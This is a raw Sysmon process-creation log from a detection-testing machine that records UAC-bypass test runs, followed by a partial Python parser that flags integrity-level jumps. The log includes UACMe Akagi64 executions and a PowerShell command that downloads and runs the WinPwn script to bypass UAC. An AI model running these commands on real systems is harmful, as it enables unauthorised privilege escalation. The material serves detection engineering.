"c:\Users\VICTIM\AppData\Local\Temp\CSC2CCDD382BF7B42C097966CDD1BB7183F.TMP"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=76C1219AF982CDFD4C2ED915EB4AE0EE99895C01,MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{51A89197-C7CC-6552-6E03-000000001E00}7148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\VICTIM\AppData\Local\Temp\jpceq0d1.cmdline"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000684349Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:16.121{51A89197-C7CC-6552-6E03-000000001E00}7148C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.3056.0 built by: NET472REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\VICTIM\AppData\Local\Temp\jpceq0d1.cmdline"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=311F2313016303A7B0296FCFA1E821905FF84304,MD5=B46100977911A0C9FB1C3E5F16A5017D,SHA256=DB58611DD100D2280FAD9BB38982FC287A46C42DD8C2F5C964C5796AB9371FE6,IMPHASH=9C5140449778B9B7CEF1476457A218C0{00000000-0000-0000-0000-000000000000}2756--- 154100x8000000000000000683998Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:12.197{51A89197-C7C8-6552-6D03-000000001E00}3216C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff 
-ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7C8-6552-6C03-000000001E00}2756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\cmd.exe\"" -technique magic}ATTACKBOX-WIN10\VICTIM 154100x8000000000000000683991Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:12.128{51A89197-C7C8-6552-6C03-000000001E00}2756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" & {$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') UACBypass -noninteractive -command \""C:\windows\system32\cmd.exe\"" -technique magic}C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000683842Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 
01:05:08.187{51A89197-C7C4-6552-6B03-000000001E00}952C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7C4-6552-6A03-000000001E00}7528C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000683832Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:08.175{51A89197-C7C4-6552-6A03-000000001E00}7528C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7C3-6552-6903-000000001E00}7928C:\Windows\System32\changepk.exe"C:\Windows\system32\ChangePk.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000683452Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:07.838{51A89197-C7C3-6552-6903-000000001E00}7928C:\Windows\System32\changepk.exe10.0.17134.1 (WinBuild.160101.0800)Windows ActivationMicrosoft® Windows® Operating SystemMicrosoft Corporationchangepk.exe"C:\Windows\system32\ChangePk.exe" 
C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=81EE099CB3CE1CC7DCEE08C4F29A9F277A920069,MD5=2B29E820325F39685C53A9EC2D919FE2,SHA256=83D4E9944FED7EC8B4B0D7FBBFD50D8F24C58622ABBC43157A0F8F6983086B0C,IMPHASH=EE5F6B3569A8EE40ED33F2B9CA2883A9{51A89197-C7C3-6552-6803-000000001E00}184C:\Windows\System32\slui.exe"C:\Windows\system32\slui.exe" 0x03ATTACKBOX-WIN10\VICTIM 154100x8000000000000000683184Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:07.574{51A89197-C7C3-6552-6803-000000001E00}184C:\Windows\System32\slui.exe10.0.17134.1 (WinBuild.160101.0800)Windows Activation ClientMicrosoft® Windows® Operating SystemMicrosoft Corporationslui.exe"C:\Windows\system32\slui.exe" 0x03C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=02DFA07143911500925C6298864477296F414AB0,MD5=96A8EF9387619D17BB30B024DDF52BF3,SHA256=ECC41BB93E0E1EA63A1027D551BA0FCE503E53EF1BA2E70944FD7E7C7C9A9B8A,IMPHASH=28B27ED7142C9F97A3A0A1D893305C1F{51A89197-C7C3-6552-6703-000000001E00}5260C:\Windows\System32\slui.exe"C:\Windows\system32\slui.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682875Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:07.242{51A89197-C7C3-6552-6703-000000001E00}5260C:\Windows\System32\slui.exe10.0.17134.1 (WinBuild.160101.0800)Windows Activation ClientMicrosoft® Windows® Operating SystemMicrosoft Corporationslui.exe"C:\Windows\system32\slui.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=02DFA07143911500925C6298864477296F414AB0,MD5=96A8EF9387619D17BB30B024DDF52BF3,SHA256=ECC41BB93E0E1EA63A1027D551BA0FCE503E53EF1BA2E70944FD7E7C7C9A9B8A,IMPHASH=28B27ED7142C9F97A3A0A1D893305C1F{51A89197-C7C2-6552-6503-000000001E00}4036C:\DetectionTesting\Temp\ExternalPayloads\uacme\61 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 
154100x8000000000000000682616Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:07.047{51A89197-C7C3-6552-6603-000000001E00}7948C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 294 0000025DF4742AC0C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000682517Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:06.823{51A89197-C7C2-6552-6503-000000001E00}4036C:\DetectionTesting\Temp\ExternalPayloads\uacme\61 Akagi64.exe3.5.4.2012Pentesting utilityUACMeIntegrity Investment LLCAkagi.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8E290B4847BE1426A47228F3FEDF9F40B093905D,MD5=95FA285D070D40687639C66605AA4232,SHA256=BA2588DBA2CFEF38361ADC775B7EFDCA61976446DD18B5303FCE9E99ED610A6D,IMPHASH=49F99D1CD91BD039949B1E3472B20922{51A89197-C7C2-6552-6303-000000001E00}4320C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682485Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:06.747{51A89197-C7C2-6552-6403-000000001E00}200C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff 
-ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7C2-6552-6303-000000001E00}4320C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682478Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:06.733{51A89197-C7C2-6552-6303-000000001E00}4320C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682396Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:06.161{51A89197-C7C2-6552-6203-000000001E00}7244C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff 
-ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7C2-6552-6103-000000001E00}2672C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000682389Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:06.152{51A89197-C7C2-6552-6103-000000001E00}2672C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exeC:\Windows\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7C2-6552-6003-000000001E00}6008C:\Windows\System32\ComputerDefaults.exeC:\Windows\system32\computerdefaults.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000682383Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:06.144{51A89197-C7C2-6552-6003-000000001E00}6008C:\Windows\System32\ComputerDefaults.exe10.0.17134.1 (WinBuild.160101.0800)Set Program Access and Computer Defaults Control PanelMicrosoft® Windows® Operating SystemMicrosoft CorporationComputerDefaults.EXEC:\Windows\system32\computerdefaults.exeC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=6ACA6C418777015ECD87287C1228084720B26AA4,MD5=1D494543B5C91E0EDD4C7C6C63EE25F0,SHA256=F2B961FC015180D8B4602EB4F4D22A6673AB6C3ED654C59E03F0AFBA1B68A2F5,IMPHASH=E4233225763223D3EDD7DFC3552572B3{51A89197-C7C1-6552-5D03-000000001E00}5140C:\DetectionTesting\Temp\ExternalPayloads\uacme\59 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\59 
Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682100Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:06.003{51A89197-C7C2-6552-5F03-000000001E00}6496C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 360 0000025DF26E2400C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000682091Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:05.984{51A89197-C7C1-6552-5E03-000000001E00}5968C:\Windows\System32\winver.exe10.0.17134.1 (WinBuild.160101.0800)Version Reporter AppletMicrosoft® Windows® Operating SystemMicrosoft CorporationWINVER.EXEC:\Windows\system32\winver.exeC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=B918998D9C9CEEC44703A2282FA000FF75CBD65C,MD5=8A35F8B5BF9F88AAE14182F00DAC8234,SHA256=91D8984C81BDF8A31755EA7CE522F7507E41812D2A3E6429C82A7072514FD5F4,IMPHASH=92BE77A081419D46930EEB51BF20D61B{51A89197-C7C1-6552-5D03-000000001E00}5140C:\DetectionTesting\Temp\ExternalPayloads\uacme\59 Akagi64.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682042Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:05.857{51A89197-C7C1-6552-5D03-000000001E00}5140C:\DetectionTesting\Temp\ExternalPayloads\uacme\59 Akagi64.exe3.5.4.2012Pentesting utilityUACMeIntegrity Investment LLCAkagi.exe"C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\59 
Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=9DC297DCC8A35F1265E928640C018284DA945C90,MD5=89D5B518A790EC3B687F20BB41FF5DA6,SHA256=B5B0EB91BBF1E858F3B6A87EAF048BBE74EBE130C609DF693562E431A2DFE9A0,IMPHASH=49F99D1CD91BD039949B1E3472B20922{51A89197-C7C1-6552-5B03-000000001E00}8012C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682010Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:05.791{51A89197-C7C1-6552-5C03-000000001E00}6408C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7C1-6552-5B03-000000001E00}8012C:\Windows\System32\cmd.exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000682003Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:05.784{51A89197-C7C1-6552-5B03-000000001E00}8012C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "C:\DetectionTesting\Temp\atomics\..\ExternalPayloads\uacme\59 
Akagi64.exe"C:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000681965Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:05.543{51A89197-C7C1-6552-5A03-000000001E00}7424C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exeC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7C0-6552-5803-000000001E00}4104C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000681839Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:04.591{51A89197-C7C0-6552-5903-000000001E00}6616C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C7C0-6552-5803-000000001E00}4104C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" ATTACKBOX-WIN10\VICTIM 
154100x8000000000000000681832Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:04.582{51A89197-C7C0-6552-5803-000000001E00}4104C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C7BF-6552-5703-000000001E00}1616C:\Windows\System32\msconfig.exe"C:\Windows\system32\msconfig.exe" -5ATTACKBOX-WIN10\VICTIM 154100x8000000000000000681684Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.449{51A89197-C7BF-6552-5703-000000001E00}1616C:\Windows\System32\msconfig.exe10.0.17134.1 (WinBuild.160101.0800)System Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationmsconfig.EXE"C:\Windows\system32\msconfig.exe" -5C:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-56D8-010000000000}0x1d8561HighSHA1=E8FFF9E605F287BFF3110A777DAF66B11C48E1BE,MD5=75753F256D22B6DC6BCEC1528E8C87C1,SHA256=12DA9E2CD5E7CAC990EA2C2E0A0FFE9D4A963CCD05986330D7DC57E68C19374E,IMPHASH=B9ED4A93C60CF189167E373CF6AFD577{51A89197-C7BF-6552-5203-000000001E00}5524C:\Users\VICTIM\AppData\Local\Temp\Fubuki.exeC:\Windows\system32\cmd.exeATTACKBOX-WIN10\VICTIM 154100x8000000000000000681655Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.386{51A89197-C7BF-6552-5603-000000001E00}5660C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT 
AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000681612Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.314{51A89197-C7BF-6552-5503-000000001E00}508C:\Windows\System32\dllhost.exe10.0.17134.1 (WinBuild.160101.0800)COM SurrogateMicrosoft® Windows® Operating SystemMicrosoft Corporationdllhost.exeC:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=257815EF5AC9E0408D327C5D1627D4C3795FF341,MD5=2528137C6745C4EADD87817A1909677E,SHA256=204FD3DA29E9197A7E82AB628E017A74082934E87092AFE18D253446608E0971,IMPHASH=68E651F131674892AE7E46556EB24726{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000681369Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:05:03.183{51A89197-C7BF-6552-5403-000000001E00}1904C:\Windows\System32\consent.exe10.0.17134.677 (WinBuild.160101.0800)Consent UI for administrative applicationsMicrosoft® Windows® Operating SystemMicrosoft Corporationconsent.execonsent.exe 368 322 0000025DF37D7600C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=46776A2D63FF16E07EC79F666378F28F6FC770B6,MD5=9BF568CAC95DC11234078BA936B1DDFF,SHA256=CC48981C30BEE846DC04538A7F45D505C37F39F2384483D97E8D52B9D0E52C7D,IMPHASH=522D83761201075834F05037F5307949{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 
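Added example (not part of this export): a Python parser for the run-together Sysmon Event ID 1 records in this page, plus the check a detection engineer would run over them, the parent/child integrity-level jump that the UACMe and WinPwn runs leave behind. The four embedded records are the method-56 chain copied verbatim from this export (Akagi64.exe at Medium, then osk.exe at High, Fubuki.exe at Medium and msconfig.exe -5 at High, 01:05:02.282 to 01:05:03.449), joined with a space the way the export runs records together. Assumptions, stated again in the code: the host name is AttackBox-Win10 (the export glues the Computer field to UtcTime with a '-'), TerminalSessionId is a single digit, CurrentDirectory is the last drive-rooted path ending in a backslash before the User field, and ParentCommandLine is split from ParentUser only on user names the User field has already shown unambiguously.

```python
"""Added example, not part of the original Sysmon export: parse the flattened
Event ID 1 records shown on this page and flag integrity-level jumps."""
import re

# Sysmon EID 1, Version 5, Level 4, Task 1, Opcode 0 and the Keywords value
# 0x8000000000000000 appear glued together as "154100x8000000000000000";
# EventRecordID follows immediately.
RECORD = re.compile(r"""
    ^154100x8000000000000000(?P<EventRecordID>\d+)Microsoft-Windows-Sysmon/Operational
    (?P<Computer>.*?)(?P<UtcTime>\d{4}-\d\d-\d\d\ \d\d:\d\d:\d\d\.\d{3})
    \{(?P<ProcessGuid>[0-9A-F-]{36})\}(?P<ProcessId>\d+)
    (?P<Image>[A-Z]:\\.*?\.exe)                         # first ".exe" after the PID
    (?P<Middle>.*?)                                     # FileVersion .. CommandLine + CurrentDirectory
    (?P<User>[A-Za-z0-9 .-]+\\[A-Za-z0-9 .$-]+)         # DOMAIN/user, sits right before LogonGuid
    \{(?P<LogonGuid>[0-9A-F-]{36})\}
    (?P<LogonId>0x[0-9a-f]+)(?P<TerminalSessionId>\d)   # assumption: session id is one digit
    (?P<IntegrityLevel>Low|Medium|High|System)
    (?P<Hashes>SHA1=[0-9A-F]+,MD5=[0-9A-F]+,SHA256=[0-9A-F]+,IMPHASH=[0-9A-F]+)
    \{(?P<ParentProcessGuid>[0-9A-F-]{36})\}(?P<ParentProcessId>\d+)
    (?P<ParentImage>[A-Z]:\\.*?\.exe)
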